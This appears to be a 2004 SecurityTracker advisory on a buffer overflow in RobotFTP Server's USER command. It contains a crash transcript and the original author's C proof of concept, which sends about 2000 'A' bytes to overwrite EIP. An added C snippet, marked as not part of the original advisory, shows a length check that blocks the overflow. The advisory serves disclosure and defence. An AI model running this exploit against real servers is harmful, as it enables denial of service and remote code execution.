SecurityTracker.com
Category:   Application (File Transfer/Sharing)  >   RobotFTP
Vendors:   robotftp.com
RobotFTP Server 'user' Buffer Overflow Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1009077
SecurityTracker URL:  http://securitytracker.com/id/1009077
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Feb 16 2004
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.0, 2.0 beta 1
Description:   A buffer overflow vulnerability was reported in the RobotFTP server. A remote user can execute arbitrary code on the target system.

gsicht reported that a remote user can supply specially crafted text for the 'user' field to trigger a buffer overflow and execute arbitrary code with the privileges of the FTP service.

A demonstration exploit transcript is provided:

220 Connected to RobotFTP Server
Benutzer (done:(none)): <AA...more than 47 A's...AA>
331 User name OK, send password as PASS
Kennwort:
530 User cannot log in
Anmeldung fehlgeschlagen.
ftp> Ungültiger Befehl
ftp> user <AA... about 2000 A's ...AA>
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
502 Command not implemented
Anmeldung fehlgeschlagen.
ftp> Ungültiger Befehl
CRASH!!!!!!
ftp> quit
C:\Dokumente und Einstellungen\Admin\Desktop>

Some demonstration exploit code is provided in the Source Message.
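
The boundary error described above is closed by checking the length of the USER argument before it is copied into a fixed-size buffer. The following C code is an added example, not RobotFTP code and not part of the original advisory; handle_user_line, probe and the 32-byte MAX_USER_LEN limit are hypothetical names and an assumed policy value, and the input lines are constructed.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_USER_LEN 32  /* assumed policy limit, not a RobotFTP value */

/* Case-insensitive match of the "USER " verb; stops at an early NUL. */
static int is_user_verb(const char *line)
{
    for (size_t i = 0; i < 5; i++)
        if (toupper((unsigned char)line[i]) != "USER "[i]) return 0;
    return 1;
}

/* line must be NUL-terminated (read it with a bounded receive).
 * Returns the FTP reply to send: 331 accepted, 501 rejected, 500 not USER. */
int handle_user_line(const char *line, char *out, size_t outsz)
{
    if (outsz == 0) return 501;
    out[0] = '\0';
    if (!is_user_verb(line)) return 500;
    const char *arg = line + 5;
    size_t n = strcspn(arg, "\r\n");        /* argument length up to CR/LF */
    if (n == 0 || n > MAX_USER_LEN || n >= outsz)
        return 501;                          /* length checked before any copy */
    for (size_t i = 0; i < n; i++)
        if (!isprint((unsigned char)arg[i])) return 501;
    memcpy(out, arg, n);
    out[n] = '\0';
    return 331;
}

/* Constructed input: "USER " followed by name_len 'A' characters. */
int probe(size_t name_len)
{
    static char line[4096];
    char name[MAX_USER_LEN + 1];
    if (name_len > sizeof line - 8) return -1;
    memcpy(line, "USER ", 5);
    memset(line + 5, 'A', name_len);
    memcpy(line + 5 + name_len, "\r\n", 3); /* CR, LF and the NUL */
    return handle_user_line(line, name, sizeof name);
}

int main(void)
{
    printf("%d %d %d\n", probe(8), probe(48), probe(2000));
    return 0;
}
```

Oversized names are answered with 501 and never reach memcpy, so the 48-character and 2000-character inputs from the transcript are rejected the same way.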

Impact:   A remote user can execute arbitrary code on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.robotftp.com/
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  buffer overflow in Robot FTP Server




Application:  Robot FTP Server
              http://www.robotftp.com/
Versions:     1.0/2.0 beta 1 
Platforms:    Windows NT
Bug:          Buffer Overflow
Exploitation: remote
Date:         15 Feb 2004
Author:       gsicht
              e-mail: nothing.king@firemail.de

#######################################################################
1) Introduction
2) Bug
3) The Code
#######################################################################
===============
1) Introduction
===============
Quote from the Robot ftp's website:
"RobotFTP server is an FTP server that will transform any windows computer into an FTP site and enable distribution of files to co-workers or friends.

Robotftp Server is extremely easy to setup and configure. You can create password protected or anonymous accounts, specify folders and files that are accessible for each account, and monitor activities of connected users."

#######################################################################
======
2) Bug
======
I found a buffer overflow vulnerability in Robotftp server in the username field that allows remote command execution. I only found this vulnerability with the windows ftp client. It doesn't work with netcat or telnet.

C:\Dokumente und Einstellungen\Admin\Desktop>ftp localhost

220 Connected to RobotFTP Server
Benutzer (done:(none)): <AA...more than 47 A's...AA>  
331 User name OK, send password as PASS
Kennwort:
530 User cannot log in
Anmeldung fehlgeschlagen.
ftp> user <AA... about 2000 A's ...AA>
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
502 Command not implemented
Anmeldung fehlgeschlagen.
CRASH!!!!!!
ftp> quit
C:\Dokumente und Einstellungen\Admin\Desktop>

#######################################################################
===========
3) The Code
===========
/******************************
this is example code for the vulnerability. It uses the windows ftp client to connect to a server
******************************/
#include <stdio.h>
#include <stdlib.h>	/* exit(), system() */
#include <string.h>	/* memset(), memcpy() */

char buffer[2500];	/* global, zero-initialised: the script text stays NUL-terminated */
char cmd[64];

int main(int argc, char *argv[])
{
	FILE *evil;

	if(argv[1] == NULL)
	{
		printf("Usage: %s [IP]\n\n",argv[0]);
		return 0;
	}

	/* ftp script: a 47-byte user name, a dummy line, then the long USER command */
	memset(buffer,0x41,47);
	memcpy(buffer+47,"\r\n",2);
	memcpy(buffer+49,"crash",5);
	memcpy(buffer+54,"\r\n",2);
	memcpy(buffer+56,"USER ",5);
	memset(buffer+61,0x41,1989);
	memset(buffer+61+1989,0x58,4);	// << overwrites the eip with XXXX
	memcpy(buffer+65+1989,"\r\n",2);

	/* bounded formatting so a long argument cannot overrun cmd */
	snprintf(cmd,sizeof(cmd),"ftp -s:ftp.txt %s",argv[1]);


	if((evil = fopen("ftp.txt", "a+")) != NULL)
	{
		fputs(buffer, evil);
		fclose(evil);
		printf("- file written!\n");
	}
	else
	{
		fprintf(stderr, "ERROR: couldn't open ftp.txt!\n");
		exit(1);
	}
	system(cmd);

	return 0;
}
/*******************************/
#######################################################################

 
 

